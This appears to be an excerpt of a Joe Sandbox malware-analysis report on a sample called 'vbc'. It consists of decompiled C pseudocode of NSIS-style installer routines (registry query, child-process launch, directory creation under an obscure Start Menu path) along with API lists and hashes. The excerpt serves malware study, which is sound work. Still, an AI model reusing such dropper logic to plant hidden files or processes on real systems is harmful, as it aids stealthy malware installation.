                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: e13740883462cc78ac6c5afbeaba50eff29be6575239932ced4c036c4fe7d772
                                                • Instruction ID: 6ed1dcd439a9d73e7b184d3b9e055cec6739c9c837aa6d28afee44abb1cd8dac
                                                • Opcode Fuzzy Hash: e13740883462cc78ac6c5afbeaba50eff29be6575239932ced4c036c4fe7d772
                                                • Instruction Fuzzy Hash: 6611377150010DFFEF219F90DE89DAE7B6DFB64348F10007AFA01A11A0D7B58E59AA69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                				void _v36;
                                                				struct HINSTANCE__* _t34;
                                                				intOrPtr _t38;
                                                				void* _t44;
                                                				void* _t45;
                                                				void* _t46;
                                                				void* _t50;
                                                				intOrPtr _t53;
                                                				signed int _t57;
                                                				signed int _t61;
                                                				void* _t65;
                                                				void* _t66;
                                                				void* _t70;
                                                				void* _t74;
                                                
                                                				_t74 = __esi;
                                                				_t66 = __edi;
                                                				_t65 = __edx;
                                                				 *0x1000406c = _a8;
                                                				 *0x10004070 = _a16;
                                                				 *0x10004074 = _a12;
                                                				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
                                                				_push(1); // executed
                                                				_t34 = E10001B18(); // executed
                                                				_t50 = _t34;
                                                				if(_t50 == 0) {
                                                					L28:
                                                					return _t34;
                                                				} else {
                                                					if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                						E10002286(_t50);
                                                					}
                                                					_push(_t50);
                                                					E100022D0(_t65);
                                                					_t53 =  *((intOrPtr*)(_t50 + 4));
                                                					if(_t53 == 0xffffffff) {
                                                						L14:
                                                						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
                                                							if( *((intOrPtr*)(_t50 + 4)) == 0) {
                                                								_t34 = E100024A9(_t50);
                                                							} else {
                                                								_push(_t74);
                                                								_push(_t66);
                                                								_t12 = _t50 + 0x1018; // 0x1018
                                                								_t57 = 8;
                                                								memcpy( &_v36, _t12, _t57 << 2);
                                                								_t38 = E100015B4(_t50);
                                                								_t15 = _t50 + 0x1018; // 0x1018
                                                								_t70 = _t15;
                                                								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
                                                								 *_t70 = 4;
                                                								E100024A9(_t50);
                                                								_t61 = 8;
                                                								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
                                                							}
                                                						} else {
                                                							E100024A9(_t50);
                                                							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
                                                						}
                                                						if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                							_t34 = E1000246C(_t50);
                                                							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
                                                								_t34 =  *(_t50 + 0x1008);
                                                								if(_t34 != 0) {
                                                									_t34 = FreeLibrary(_t34);
                                                								}
                                                							}
                                                							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
                                                								_t34 = E1000153D( *0x10004068);
                                                							}
                                                						}
                                                						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
                                                							goto L28;
                                                						} else {
                                                							return GlobalFree(_t50);
                                                						}
                                                					}
                                                					_t44 =  *_t50;
                                                					if(_t44 == 0) {
                                                						if(_t53 != 1) {
                                                							goto L14;
                                                						}
                                                						E10002B5F(_t50);
                                                						L12:
                                                						_t50 = _t44;
                                                						L13:
                                                						goto L14;
                                                					}
                                                					_t45 = _t44 - 1;
                                                					if(_t45 == 0) {
                                                						L8:
                                                						_t44 = E100028A4(_t53, _t50); // executed
                                                						goto L12;
                                                					}
                                                					_t46 = _t45 - 1;
                                                					if(_t46 == 0) {
                                                						E10002645(_t50);
                                                						goto L13;
                                                					}
                                                					if(_t46 != 1) {
                                                						goto L14;
                                                					}
                                                					goto L8;
                                                				}
                                                			}

















                                                0x10001759
                                                0x10001759
                                                0x10001759
                                                0x10001763
                                                0x1000176b
                                                0x10001778
                                                0x10001786
                                                0x10001789
                                                0x1000178b
                                                0x10001790
                                                0x10001795
                                                0x100018a8
                                                0x100018a8
                                                0x1000179b
                                                0x1000179f
                                                0x100017a2
                                                0x100017a7
                                                0x100017a8
                                                0x100017a9
                                                0x100017af
                                                0x100017b5
                                                0x100017e5
                                                0x100017ec
                                                0x10001810
                                                0x1000184f
                                                0x10001812
                                                0x10001812
                                                0x10001813
                                                0x10001816
                                                0x1000181c
                                                0x10001820
                                                0x10001823
                                                0x10001828
                                                0x10001828
                                                0x1000182f
                                                0x10001835
                                                0x1000183b
                                                0x10001847
                                                0x10001848
                                                0x1000184b
                                                0x100017ee
                                                0x100017ef
                                                0x10001804
                                                0x10001804
                                                0x10001859
                                                0x1000185c
                                                0x10001869
                                                0x10001870
                                                0x10001878
                                                0x1000187b
                                                0x1000187b
                                                0x10001878
                                                0x10001888
                                                0x10001890
                                                0x10001895
                                                0x10001888
                                                0x1000189d
                                                0x00000000
                                                0x1000189f
                                                0x00000000
                                                0x100018a0
                                                0x1000189d
                                                0x100017b9
                                                0x100017bc
                                                0x100017da
                                                0x00000000
                                                0x00000000
                                                0x100017dd
                                                0x100017e2
                                                0x100017e2
                                                0x100017e4
                                                0x00000000
                                                0x100017e4
                                                0x100017be
                                                0x100017bf
                                                0x100017c7
                                                0x100017c8
                                                0x00000000
                                                0x100017c8
                                                0x100017c1
                                                0x100017c2
                                                0x100017d0
                                                0x00000000
                                                0x100017d0
                                                0x100017c5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100017c5

                                                APIs
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                  • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                  • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                  • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarylstrcpy
                                                • String ID:
                                                • API String ID: 1791698881-3916222277
                                                • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 59%
                                                			E00401C19(intOrPtr __edx) {
                                                				int _t29;
                                                				long _t30;
                                                				signed int _t32;
                                                				WCHAR* _t35;
                                                				long _t36;
                                                				int _t41;
                                                				signed int _t42;
                                                				int _t46;
                                                				int _t56;
                                                				intOrPtr _t57;
                                                				struct HWND__* _t61;
                                                				void* _t64;
                                                
                                                				_t57 = __edx;
                                                				_t29 = E00402C31(3);
                                                				 *((intOrPtr*)(_t64 - 0x50)) = _t57;
                                                				 *(_t64 - 0x10) = _t29;
                                                				_t30 = E00402C31(4);
                                                				 *((intOrPtr*)(_t64 - 0x50)) = _t57;
                                                				 *(_t64 + 8) = _t30;
                                                				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                					 *((intOrPtr*)(__ebp - 0x10)) = E00402C53(0x33);
                                                				}
                                                				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                					 *(_t64 + 8) = E00402C53(0x44);
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                				_push(1);
                                                				if(__eflags != 0) {
                                                					_t59 = E00402C53();
                                                					_t32 = E00402C53();
                                                					asm("sbb ecx, ecx");
                                                					asm("sbb eax, eax");
                                                					_t35 =  ~( *_t31) & _t59;
                                                					__eflags = _t35;
                                                					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
                                                					goto L10;
                                                				} else {
                                                					_t61 = E00402C31();
                                                					 *((intOrPtr*)(_t64 - 0x50)) = _t57;
                                                					_t41 = E00402C31(2);
                                                					 *((intOrPtr*)(_t64 - 0x50)) = _t57;
                                                					_t56 =  *(_t64 - 0x14) >> 2;
                                                					if(__eflags == 0) {
                                                						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
                                                						L10:
                                                						 *(_t64 - 0x30) = _t36;
                                                					} else {
                                                						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
                                                						asm("sbb eax, eax");
                                                						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                					}
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                					_push( *(_t64 - 0x30));
                                                					E00406159();
                                                				}
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t64 - 4));
                                                				return 0;
                                                			}















                                                0x00401c19
                                                0x00401c1b
                                                0x00401c22
                                                0x00401c25
                                                0x00401c28
                                                0x00401c32
                                                0x00401c36
                                                0x00401c39
                                                0x00401c42
                                                0x00401c42
                                                0x00401c45
                                                0x00401c49
                                                0x00401c52
                                                0x00401c52
                                                0x00401c55
                                                0x00401c59
                                                0x00401c5b
                                                0x00401cb0
                                                0x00401cb2
                                                0x00401cbd
                                                0x00401cc7
                                                0x00401cca
                                                0x00401cca
                                                0x00401cd3
                                                0x00000000
                                                0x00401c5d
                                                0x00401c64
                                                0x00401c66
                                                0x00401c69
                                                0x00401c6f
                                                0x00401c76
                                                0x00401c79
                                                0x00401ca1
                                                0x00401cd9
                                                0x00401cd9
                                                0x00401c7b
                                                0x00401c89
                                                0x00401c91
                                                0x00401c94
                                                0x00401c94
                                                0x00401c79
                                                0x00401cdc
                                                0x00401cdf
                                                0x00401ce5
                                                0x00402a81
                                                0x00402a81
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
                                                • Instruction ID: 75e6d6340c5f39a85289ca98609147a27814c24a1fb1496c30dcde5ce6f9f3d4
                                                • Opcode Fuzzy Hash: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
                                                • Instruction Fuzzy Hash: 1A21C171908219AEEF04AFA4DE4AABE7BB4FF44304F14453EF505BA1D0D7B88541DB28
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E004060DF(void* _a4, int _a8, short* _a12, int _a16, void* _a20) {
                                                				long _t20;
                                                				long _t23;
                                                				long _t24;
                                                				char* _t26;
                                                
                                                				asm("sbb eax, eax");
                                                				_t26 = _a16;
                                                				 *_t26 = 0;
                                                				_t20 = RegOpenKeyExW(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                				if(_t20 == 0) {
                                                					_a8 = 0x800;
                                                					_t23 = RegQueryValueExW(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
                                                					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
                                                						 *_t26 = 0;
                                                					}
                                                					_t26[0x7fe] = 0;
                                                					_t24 = RegCloseKey(_a20); // executed
                                                					return _t24;
                                                				}
                                                				return _t20;
                                                			}







                                                0x004060ef
                                                0x004060f1
                                                0x004060fe
                                                0x00406109
                                                0x00406111
                                                0x00406116
                                                0x0040612a
                                                0x00406132
                                                0x00406140
                                                0x00406140
                                                0x00406146
                                                0x0040614d
                                                0x00000000
                                                0x0040614d
                                                0x00406156

                                                APIs
                                                • RegOpenKeyExW.KERNEL32 ref: 00406109
                                                • RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?), ref: 0040612A
                                                • RegCloseKey.KERNEL32(?), ref: 0040614D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Call
                                                • API String ID: 3677997916-1824292864
                                                • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                • Instruction ID: 5a49725d9b8b462efd799bce316dcbaad7059079bb26d9a6c1e38be835131f9e
                                                • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                • Instruction Fuzzy Hash: 2F015A3110020AEACF218F26ED08EDB3BA9EF88391F01403AFD55D6220D774D964CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E00401ED5() {
                                                				void* _t16;
                                                				long _t20;
                                                				void* _t25;
                                                				void* _t32;
                                                
                                                				_t29 = E00402C53(_t25);
                                                				E00405371(0xffffffeb, _t14);
                                                				_t16 = E004058F2(_t29); // executed
                                                				 *(_t32 + 8) = _t16;
                                                				if(_t16 == _t25) {
                                                					 *((intOrPtr*)(_t32 - 4)) = 1;
                                                				} else {
                                                					if( *((intOrPtr*)(_t32 - 0x20)) != _t25) {
                                                						_t20 = WaitForSingleObject(_t16, 0x64);
                                                						while(_t20 == 0x102) {
                                                							E00406628(0xf);
                                                							_t20 = WaitForSingleObject( *(_t32 + 8), 0x64);
                                                						}
                                                						GetExitCodeProcess( *(_t32 + 8), _t32 - 0x38);
                                                						if( *((intOrPtr*)(_t32 - 0x24)) < _t25) {
                                                							if( *(_t32 - 0x38) != _t25) {
                                                								 *((intOrPtr*)(_t32 - 4)) = 1;
                                                							}
                                                						} else {
                                                							E00406159( *((intOrPtr*)(_t32 - 0xc)),  *(_t32 - 0x38));
                                                						}
                                                					}
                                                					_push( *(_t32 + 8));
                                                					CloseHandle();
                                                				}
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t32 - 4));
                                                				return 0;
                                                			}







                                                0x00401edb
                                                0x00401ee0
                                                0x00401ee6
                                                0x00401eed
                                                0x00401ef0
                                                0x004028a1
                                                0x00401ef6
                                                0x00401ef9
                                                0x00401f04
                                                0x00401f1b
                                                0x00401f0f
                                                0x00401f19
                                                0x00401f19
                                                0x00401f26
                                                0x00401f2f
                                                0x00401f41
                                                0x00401f43
                                                0x00401f43
                                                0x00401f31
                                                0x00401f37
                                                0x00401f37
                                                0x00401f2f
                                                0x00401f4a
                                                0x00401f4d
                                                0x00401f4d
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                  • Part of subcall function 00405371: lstrcatW.KERNEL32 ref: 004053CC
                                                  • Part of subcall function 00405371: SetWindowTextW.USER32 ref: 004053DE
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                  • Part of subcall function 004058F2: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
                                                  • Part of subcall function 004058F2: CloseHandle.KERNEL32(?), ref: 00405928
                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401F04
                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401F19
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401F26
                                                • CloseHandle.KERNEL32(?), ref: 00401F4D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 3585118688-0
                                                • Opcode ID: ce4c3a4a0d49c2fc719532998435d9b7fd41d27e7351c183d24eba856eac605c
                                                • Instruction ID: a49aa3197bbdededf4fd909b386d72e1103700f3deb01b848309097317d3e37e
                                                • Opcode Fuzzy Hash: ce4c3a4a0d49c2fc719532998435d9b7fd41d27e7351c183d24eba856eac605c
                                                • Instruction Fuzzy Hash: C411C431A00109EBCF10AFA0DD84ADD7BB6EF04344F20807BF502B61E1C7B94992DB5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E004015C1(short __ebx, void* __eflags) {
                                                				void* _t17;
                                                				int _t23;
                                                				void* _t25;
                                                				signed char _t26;
                                                				short _t28;
                                                				short _t31;
                                                				short* _t34;
                                                				void* _t36;
                                                
                                                				_t28 = __ebx;
                                                				 *(_t36 + 8) = E00402C53(0xfffffff0);
                                                				_t17 = E00405C71(_t16);
                                                				_t32 = _t17;
                                                				if(_t17 != __ebx) {
                                                					do {
                                                						_t34 = E00405BF3(_t32, 0x5c);
                                                						_t31 =  *_t34;
                                                						 *_t34 = _t28;
                                                						if(_t31 != _t28) {
                                                							L5:
                                                							_t25 = E004058BD( *(_t36 + 8));
                                                						} else {
                                                							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
                                                							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E004058DA(_t42) == 0) {
                                                								goto L5;
                                                							} else {
                                                								_t25 = E00405840( *(_t36 + 8)); // executed
                                                							}
                                                						}
                                                						if(_t25 != _t28) {
                                                							if(_t25 != 0xb7) {
                                                								L9:
                                                								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                							} else {
                                                								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                								if((_t26 & 0x00000010) == 0) {
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                						 *_t34 = _t31;
                                                						_t32 = _t34 + 2;
                                                					} while (_t31 != _t28);
                                                				}
                                                				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
                                                					_push(0xfffffff5);
                                                					E00401423();
                                                				} else {
                                                					E00401423(0xffffffe6);
                                                					E00406212(L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93\\Vatersotiges\\Knoglemarvsundersgelsen\\Armoniac",  *(_t36 + 8));
                                                					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                					if(_t23 == 0) {
                                                						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                					}
                                                				}
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t36 - 4));
                                                				return 0;
                                                			}











                                                0x004015c1
                                                0x004015c9
                                                0x004015cc
                                                0x004015d1
                                                0x004015d5
                                                0x004015d7
                                                0x004015df
                                                0x004015e1
                                                0x004015e4
                                                0x004015ea
                                                0x00401604
                                                0x00401607
                                                0x004015ec
                                                0x004015ec
                                                0x004015ef
                                                0x00000000
                                                0x004015fa
                                                0x004015fd
                                                0x004015fd
                                                0x004015ef
                                                0x0040160e
                                                0x00401615
                                                0x00401624
                                                0x00401624
                                                0x00401617
                                                0x0040161a
                                                0x00401622
                                                0x00000000
                                                0x00000000
                                                0x00401622
                                                0x00401615
                                                0x00401627
                                                0x0040162b
                                                0x0040162c
                                                0x004015d7
                                                0x00401634
                                                0x00401663
                                                0x0040224b
                                                0x00401636
                                                0x00401638
                                                0x00401645
                                                0x0040164d
                                                0x00401655
                                                0x0040165b
                                                0x0040165b
                                                0x00401655
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                  • Part of subcall function 00405C71: CharNextW.USER32(?), ref: 00405C7F
                                                  • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
                                                  • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                  • Part of subcall function 00405840: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac,?,00000000,000000F0), ref: 0040164D
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac, xrefs: 00401640
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac
                                                • API String ID: 1892508949-910239263
                                                • Opcode ID: 46258d5e47a55c227e30756453a4487545b3b1288a22cb13dd57ab731c0ecd30
                                                • Instruction ID: 477ca9af34b4fba6f67c9146569026d5a406fcfc9585fcc70d51ae903c55bf24
                                                • Opcode Fuzzy Hash: 46258d5e47a55c227e30756453a4487545b3b1288a22cb13dd57ab731c0ecd30
                                                • Instruction Fuzzy Hash: C511D331504505EBCF30BFA4CD0199E36A0FF15358B25893BE902B22F1DB3E4A919B5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 89%
                                                			E004052E5(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                				long _t9;
                                                				int _t15;
                                                				long _t16;
                                                
                                                				_t15 = _a8;
                                                				if(_t15 != 0x102) {
                                                					if(_t15 != 0x200) {
                                                						_t16 = _a16;
                                                						L7:
                                                						if(_t15 == 0x419 &&  *0x423714 != _t16) {
                                                							_push(_t16);
                                                							_push(6);
                                                							 *0x423714 = _t16;
                                                							E00404CBB();
                                                						}
                                                						L11:
                                                						_t9 = CallWindowProcW( *0x42371c, _a4, _t15, _a12, _t16); // executed
                                                						return _t9;
                                                					}
                                                					if(IsWindowVisible(_a4) == 0) {
                                                						L10:
                                                						_t16 = _a16;
                                                						goto L11;
                                                					}
                                                					_t16 = E00404C3B(_a4, 1);
                                                					_t15 = 0x419;
                                                					goto L7;
                                                				}
                                                				if(_a12 != 0x20) {
                                                					goto L10;
                                                				}
                                                				E00404322(0x413);
                                                				return 0;
                                                			}






                                                0x004052e9
                                                0x004052f3
                                                0x0040530f
                                                0x00405331
                                                0x00405334
                                                0x0040533a
                                                0x00405344
                                                0x00405345
                                                0x00405347
                                                0x0040534d
                                                0x0040534d
                                                0x00405357
                                                0x00405365
                                                0x00000000
                                                0x00405365
                                                0x0040531c
                                                0x00405354
                                                0x00405354
                                                0x00000000
                                                0x00405354
                                                0x00405328
                                                0x0040532a
                                                0x00000000
                                                0x0040532a
                                                0x004052f9
                                                0x00000000
                                                0x00000000
                                                0x00405300
                                                0x00000000

                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00405314
